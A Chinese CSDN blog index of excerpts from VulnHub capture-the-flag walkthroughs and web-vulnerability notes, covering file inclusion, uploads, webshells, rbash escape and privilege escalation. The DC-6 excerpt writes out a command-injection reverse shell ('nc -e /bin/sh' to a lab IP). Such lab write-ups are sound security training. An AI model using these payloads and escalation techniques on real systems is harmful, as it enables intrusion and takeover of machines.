wbplife-CSDN博客

原创【vulnhub】Broken: Gallery靶机

尝试22端口的ssh进行爆破。尝试timedatectl。

2024-08-12 22:03:41 256

加密后的值（转换大小写后）为：8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918。抓包将数据包放到重放模块里进行测试，发现可以修改user_pref变量的值，从而写入到session文件中，再结合文件包含漏洞，造成RCE的漏洞。写入URL编码后的一句话木马,并在搜索框处输入命令看看是否被执行，发现成功执行。burp抓包进行测试，发现需要使用hash加密。目录扫描，拼接打开后并没有发现什么信息。进行弱口令登陆，登陆失败。

2024-08-12 22:02:40 306

原创【vulnhub】unknowndevice64: 1靶机

提示需要密码，图片名称为 key_is_h1dd3n，那么密码就是 h1dd3n，成功提取出了h1dd3n.txt；文件信息为一种brainfuck的程序语言，使用在线工具。[export命令用于设置或显示环境变量，在shell中执行程序时，shell会提供一组环境变量，export可新增，修改或删除环境变量]端口扫描，开放1337-ssh端口服务，31337-http端口服务；下载图片到本地，可使用kali中的工具steghid（开源隐写程序）查看源码，发现隐藏目录：Key_is_hidd3n.jpg。

2024-08-11 21:01:10 453

原创【vulnhub】West-Wild-v1.1靶机

这里看到有一个 wave 共享，访问一下，需要密码，扫描结果中有很多显示空密码，空密码连接成功。80端口没发现，从139和445这两个smb服务入手，枚举用户、查找共享文件夹。查看当前目录下文件，看到一个 flag.txt ，下载下来查看。base64解码，得到 flag 1 ，以及一个账号密码。显示为 all ，直接 sudo su 提权，提权成功。查看当前权限，suid、sudo等都没有可利用的。查看文件内容，得到 aveng 用户的密码。端口开放了，22、80、139、445。目录扫描，没什么信息。

2024-08-11 21:00:01 402

原创【vulnhub】WebDeveloper:1靶机

把kali linux自带的php反弹shell代码（/usr/share/webshells/php/php-reverse-shell.php）直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port，保存，并上传。找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php。首先，输入如下命令查找php-reverse-shell.php的位置。

2024-08-11 20:58:49 408

原创【vulnhub】CLAMP 1.0.1靶机

在 /var/www/html 下发现 important.pcapng,查看文件，发现内容。一些判断题，对与错对应1与0，最后结果为0110111001，拼接访问。访问 /nt4stopc/,下面有一些问题，提示必须收集答案。文件上传，以md5提交，但是没有提交按钮，自己在前端给加一个。上传该文件后，返回了文件路径，文件名为md5加密后的。点击图中位置，发现存在参数，php语言，尝试注入。nc监听，访问文件，成功反弹shell。页面访问，并查看源码。可能是路径，拼接访问。ssh连接，连接成功。

2024-08-11 20:57:05 270

原创【vulnhub】De-ICE：S1.120靶机

在列出的所有用户中，用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位，这意味着我们可以执行 getlogs.sh 命令内的任何命令。在执行 sudo –l 时，我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码。将 getlogs.sh 移动到 getlogs.sh.bak，然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell。

2024-08-11 20:53:47 278

原创【vulnhub】Hack the 21LTR: Scene 1 靶机

然后将root用户的密码写入1.txt，然后开始破解，但是连接的时候，还是连接不上，应该是配置原因，那么只能写入高权限用户了。尝试拼接到刚才目录扫描的目录的logs目录下，发现可以访问到日志文件/logs/backup_log.php。可以通过cat提权，所以可以看/etc/shadow文件，或者写入文件，选择读取shadow文件，破解密码。尝试ssh连接没成功，但是ftp连接成功了，ls查看，发现只有一个文件。尝试在日志文件写入木马，参考了一下其他文档，需要利用10001端口。赋予权限,然后ssh登录。

2024-08-11 20:51:46 404

原创【vulnhub】DC-6靶机

用bp抓包一下，在bp中输入baidu.com | nc -e /bin/sh 192.168.93.130 7878进行反弹shell，同时在kali中监听7878端口。根据靶机线索给予的代码，可以得到一个密码字典，这个字典在kali里面是有的，将文件输出到当前目录的passwords.txt。发现目录下面是几个用户文件，进去查看，在mark用户中，发现独有的stuff文件，查看文件内容。得到admin，mark，graham，sarah，jens几个用户名。

2024-08-08 21:30:27 460

原创【vulnhub】W34kn3ss 1靶机

当我们检查代码的文件类型时，发现是一个python编译的文件，把它复制到/var/www/html，就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥，在在线解码器里面没有解出来，应该需要借助工具。网址进行访问http://weakness.jth，访问是空白页面的话，换一个浏览器就可以了。页面访问443端口，会提示用https服务，会出现和80端口一样的页面，进行目录扫描。各处看了一下，好像没有什么信息了，就只剩22、443端口了，查看443端口，对这个文件进行重命名。

2024-08-08 21:29:11 405

原创【vulnhub】Wakanda :1靶机

lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录，和上面的方法一样，创建文件，并远程下载到/tmp目录下面。

2024-08-07 20:56:30 673

原创【vulnhub】Matrix：1靶机

cat /usr/share/crunch/charset.lst 选择要使用的crunch字典字符集范围。尝试访问Cypher.matrix网页，发现存在一个.bak文件，我们直接下载，用记事本打开后发现为BF编码。大体意思是：可以使用guest用户登录matrix，但是密码k1ll0rXX忘记了最后两位。使用kali自带crunch字典生成工具生成密码字典，密码一共8位，因为已知道6位了。尝试了很多命令,好多命令都不能使用，因为没有增加环境变量。到这里就已经完成了rbash逃逸，

2024-08-07 20:55:05 436

原创【vulnhub】Basic Pentesting :2靶机

445端口：靶机开放了445端口，可以使用enum4linux工具枚举smb服务的信息，发现两个用户名：kay、jan。发现/home/kay/目录存在pass.bak文件，但目前我们没有访问权限；发现可以访问kay用户的ssh私钥文件。通过ssh2john转换id_rsa为可以识别的信息，然后利用字典解密该信息，来获取文件密码。根据之前的提示，使用hydra工具爆破jan用户的ssh密码，得到：jan:armando。需要输入密码，输入上面pass.bak里的试一下，发现成功。查看pass.bak文件。

2024-08-06 21:05:38 407

原创【vulnhub】DC-2靶机

发现登录上了，进行权限查看，发现有rbash限制。有一些命令不能使用，发现echo命令export命令可以使用，我们使用echo命令查看一下系统命令还有啥能用。flag3提示我们su，我感觉是要我们切换到另一个用户,在tom用户下切换到jerry用户，并查询一下用户下所有相关flag的文件。发现less,ls,scp,vi命令还是可以使用的，查找如何将rbash限制进行绕过，可以使用一下命令进行绕过。发现已经绕过入了，发现了第三个flag，查看一下flag3.txt。使⽤wpscan⼯具枚举⽤户。

2024-08-05 21:29:28 351

原创【vulnhub】Bob：1.0.1靶机

解密login.txt.gpg时提示权限不够，这个账户没权限那就ssh登录到其他账户试试，前面告诉我们jc和seb账户的密码，试试。继续拼接这些目录，/dev_shell.php，是一个命令执行功能的页面，测试后发现存在过滤，并不是所有命令都可以被执行的。这里通过管道符'|'列出当前目录下的文件，发现dev_shell.php.bak，即dev_shell.php的备份文件。查看里面的文件，login.txt.gpg这是一个经过gpg加密的文件，尝试解密。在这个用户里面解密login.txt.gpg文件。

2024-08-05 20:24:00 772

原创【vulnhub】W1R3S.inc靶机

文件中描述说，/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞，可以利用特殊的 url ，查看本地文件。这是一个数据库的安装创建，但不知道密码和数据库名，观察到最上面的网页标题为Cuppa CMS，可以通过它来搜索一下它的历史漏洞，来进行利用。发现了 root 、www-data 、 w1r3s 用户的密码，尝试用 john 破解。在文件中发现了 w1r3s 用户，用同样的方法获得存密码的shadow文件试试。运行环境：vmware。

2024-08-04 19:19:41 447

原创【vulnhub】DerpNStink靶机

我刚开始用的是kali上面的searchsploit工具命令进行搜索版本利用搜索出来的脚本文件，但失败了，也可能是利用的脚本不对，大家可以多尝试几个脚本，看看能否成功，也希望与大家讨论。我在这找了一个有关版本的相关提权文件，有一个本地提权漏洞CVE-2021-4034，作用有点类似于sudo，允许用户以另一个用户身份执行命令。是需要更新本地DNS主机文件，思考应该是需要我们把IP和对应的域名进行添加到hosts文件中，但不知道域名是什么。通过目录扫描出来的，还有目录//weblog/wp-admin/

2024-08-04 19:18:33 867

原创【vulnhub】Basic Penetration靶机

因为我们知道管理员账户与密码，所以利用msf的模块来getshell，启动msf，成功 getshell。在文件/etc/shadow里面进行查看密码，发现marlinspike用户的密码，进行解密。网址后面拼接目录扫到的/secret，发现是 wordpress 搭建的。访问 /wp-admin 页面，是一个登录页面。进行sudo提权尝试，发现需要输入密码，不能用。尝试弱口令，admin：admin 成功登录。发现/etc/shadow文件是可读的。端口扫描,开启了22，80，21端口。

2024-08-04 18:42:45 278

原创【vulnhub】The Ether: Evil Science靶机

发现有一个/var/log/auth.log目录存在重定向，打开响应包，里面是日志记录，并且是ssh的记录，应该是会把ssh操作记录到这里面，我们尝试利用ssh写入一句话木马，点击各处之后，发下在点击上面的ABOUT US之后，url里有着请求参数：/index.php?利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面，回车执行就可以，继续下一条命令。对可能存在文件包含漏洞的页面进行burp抓包，对file参数后面进行文件爆破。拼接目录扫描出的目录，没有什么有用的信息，

2024-08-02 20:15:34 385

原创【vulnhub】Depth靶机

输入ps aux，找出带有 “ps aux”的正在运行的进程，选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中，但访问可能受到限制，nmap刚刚没有扫描出ssh的端口，可能存在防火墙。ls -l /home 查看到home目录内容，发现bill用户。存在系统命令执行漏洞，进行利用,反弹shell尝试失败。提示我们输入 ls -l /tmp 测试一下。,发现所有用户(ALL)都有sudo权限，运行环境：VMware运行该虚拟机。有一个目录/test.jsp。

2024-08-02 17:19:02 384

原创【vulnhub】Dina靶机

继续拼接文件里面的目录，没有什么可用的信息，只有在nothing目录里有404 NOT FOUND。是一个登录框，那肯定用户名是touhid ，密码用上面保存的那几个尝试一下，发现diana可以成功。下载这个文件，发现需要密码，用刚才发现的密码尝试，有一个正确的freedom。是一个MP3文件，正常打不开，使用记事本打开，可以找到有url和用户名。可以从图片上看到一个新的账户名，密码是自己设置的，进行跳转。进行源码检查，发现存在可能像密码的记录，进行保存。IP网址访问，点击之后没有什么可利用的信息。

2024-08-01 23:14:02 322

原创【vulnhub】RickdiculouslyEasy靶机

查看敏感内容，比如/etc/passwd之类的，但是经过测试发现cat命令不能用，但是可以使用more命令查看，如下图，发现了几个重要用户，分别是RickSanchez,Morty,Summer。进行ssh连接，发现22端口不能连接，上面端口扫描出发现22222端口也是ssh，经过尝试，Summer用户可以连接，密码：winter。里面还有一个文件html的，查看一下，使一段好像没什么关系的英文，在大部分我们遇到没什么关系的页面的时候，就查看一下源代码。进行ls查看，存在一个flag文件，进行下载查看。

2024-08-01 23:10:47 557

原创【vulnhub】Zico2靶机

此处不要使用绝对路径，需要使用相对路径。此处使用相对路径，数据库文件就会移动到当前管理页面的同级目录中，也就是 /dbadmin/中。最终在家目录中wordpress中的配置文件wp-config.php中找到了zico账号和密码 sWfCsfJSPV9H3AmQzw8。这个木马文件我们现在还访问不到，因为这个目录我们访问不到，所以我们需要通过改名来移动文件到可以访问的位置。进行端口扫描，发现开放了22（ssh），80（http）和111（rpcbind）端口。，发现a.php已经存在这个目录中了。

2024-08-01 00:34:53 536 2

原创【vulnhub】SkyTower靶机

靶机安装环境：VirtualBox这个靶机安装到Virtualbox里面，并且需要把网卡转换为桥接模式，kali也要转化为桥接模式，在注册中打开信息收集靶机的IP发现netdiscover -i eth0 -r 192.168.7.0/24进行端口扫描网址IP访问存在登录框，可以尝试看是否存在SQL注入随便输入账号密码，抓包。发现存在sql注入。并且直接就登录进去，可以得到一个账号及密码：john / hereisjohn

2024-07-30 22:54:15 413

原创【vulnhub】FristiLeaks_1.3靶机

运行环境：Virtualbox目标：获取靶机root权限和flag。

2024-07-30 21:45:53 321

原创【vulnhub】Kioptrix : Level 1.2

使用了一个python版本的exp：GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit。将exp下载下来，使用web服务上传到靶机，编译执行，在/etc/passwd文件写入一个具有root权限的用户。使用searchsploit搜索LotusCMS的历史漏洞，发现该CMS版本为3.0时存在命令执行漏洞。运行这个编译过后的文件，设置密码123456，会自动生成一个用户，跳转到这个用户。监听444端口，因为从下载的文件说明中可知，监听端口必须是444。

2024-07-29 22:25:59 310

原创【vulnhub】Lin.Security靶机

发现insecurity用户的gid和uid都是0 且显示了密码的哈希,在线查询得到密码为P@ssw0rd!看到使用了tar命令对/home下每个目录进行备份,且使用了通配符*我们可以考虑创建如下两个文件。这个时候进行ip查询，发现IP查询不到，执行下面的步骤。ssh登录这个账号，发现登陆成功，并且拥有root权限。根据网卡地址用kali进行nmap扫描发现靶机IP。进行ssh远程连接，用户名bob密码secret。从左到右以此为分,时,日,月,周。2、提权完毕后，编辑文件。利用find查询命令提权。

2024-07-29 22:23:31 377

原创 VulnHub:holynix:v1

注意：下载成功后用vmware打开，跳出提示框请选择“我已移动该虚拟机”，然后设置为NAT模式，否则无法扫描到靶机！

2024-07-12 22:41:57 503

原创 VulnHub:Hacknos-ReconForce

不知道登录名是什么，也懒得测试，直接拿msf爆破，连找字典都省了。接下来就需要切换身份为 recon 了，前面曾使用msf爆破过网站，将其字典拿过来，供hydra爆破。爆破出网站的账号密码：admin，Security@hackNos，登录之后，如下图。就是目标靶机...使用Nmap进行详细的扫描发现开放了21/22/80端口....服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..爆破出用户名：recon，密码：Security@hackNos。工具进行主机发现...出现。

2024-07-12 22:37:48 258

原创 VulnHub：Hacknos-Player V1.1靶机

root用户目录下的root.txt。

2024-07-12 22:35:15 378

原创 VulnHub靶机：Hacknos-OS-Bytesec

靶机 IP：192.168.7.123靶机目标：普通用户Flag与root用户目录下的root.txt文件...学习目标：漏洞利用/暴力破解/权限提升。

2024-07-12 18:04:29 435

原创文件解析漏洞

该版本默认将*.asp;.jpg 此种格式的文件名，当成Asp解析。服务器默认不解析;号及其后面的内容，相当于截断。iis除了会将asp解析成脚本执行文件之外，还会将 cer cdx asa 扩展名解析成asp；通过文件上传，或者创建文件，格式为*.asp;.jpg在IIS7.0和IIS7.5版本下也存在解析漏洞，在Fast-CGl运行模式下，在一个文件路径 /xx.jpg 后面加上/.php会将 /xx.jpg/.php 解析为php文件。利用条件。

2024-06-13 19:39:02 568

原创文件包含漏洞

require()，找不到被包含的文件时会产生致命错误，并停止脚本运行。include()，找不到被包含的文件时只会产生警告，脚本将继续运行。include_once()与include()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。

2024-06-13 19:38:01 790

原创命令执行与代码执行

PHP应用在调用命令执行函数执行系统命令的时候，如果将前端用户的输入数据作为系统命令的参数拼接到命令行中，在没有过滤用户的输入的情况下，就会造成命令执行漏洞。由于PHP程序未对前端用户提交的数据进行严格过滤或限制，从而导致传入的字段被带入到命令执行函数中作为参数执行，造成GetShell或接管服务器权限等高危害的Web漏洞！# 出网-有回显方法一：然后写入Webshell方法二：反弹shell方法三：远程下载木马文件# 出网-无回显方法一：反弹shell方法二：远程下载木马文件。

2024-06-13 19:21:41 561

原创文件上传漏洞

00截断是操作系统层的漏洞，由于操作系统是C语言或汇编语言编写的，这两种语言在定义字符串时，都是以0x00作为字符串的结尾，操作系统在识别字符串时，当读取道0x00字符时，就认为读取到了一个字符串的结束符号，因此，我们可以通过修改数据包，插入0x00字符的方式，达到字符串截断的目的。导致上传的图片马，恶意代码被清除；文件上传时，有的网站对文件后缀名进行校验，看是否符合允许上传的格式，不符合的话，因为数据包没有提交到服务器，只是通过JS代码进行校验，因此，Burp抓包也抓不到，就需要绕过前端JS检测。

2024-06-13 10:15:25 606

空空如也

空空如也